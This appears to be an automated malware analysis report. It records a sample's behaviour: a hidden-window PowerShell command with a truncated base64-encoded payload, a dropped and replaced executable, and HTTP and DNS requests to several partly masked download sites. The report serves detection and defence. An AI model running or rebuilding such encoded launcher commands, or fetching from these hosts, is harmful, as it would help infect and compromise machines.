Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAGUAaQBjAHYAYQBvAGgAdwBvAGkAdABrAG8AZQBqAD0AJwB2AGEAaQBoAHcAaQBhAG4AdABpAGEAcAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBgAFUAUgBJAGAAVAB5AF...
Modifies file system
Creates the following files
- %HOMEPATH%\936.exe
Deletes the following files
- %HOMEPATH%\936.exe
Substitutes the following files
- %HOMEPATH%\936.exe
Network activity
TCP
HTTP GET requests
- http://ch##g.be/carole/kkVWtXa/
- http://www.da####abarte.com/Backup/hToa8uw9648/
- http://de###er.info/blogs/EVTd35fbbn7136/
- http://fl##ox.de/cgi-bin/2O64974xq0518072/
- http://gr###sperger.de/bilder/LMZdirUag/
UDP
- DNS ASK ch##g.be
- DNS ASK da####abarte.com
- DNS ASK da####abarte.kw.com
- DNS ASK de###er.info
- DNS ASK fl##ox.de
- DNS ASK gr###sperger.de
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAGUAaQBjAHYAYQBvAGgAdwBvAGkAdABrAG8AZQBqAD0AJwB2AGEAaQBoAHcAaQBhAG4AdABpAGEAcAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBgAFUAUgBJAGAAVAB5AF...' (with hidden window)
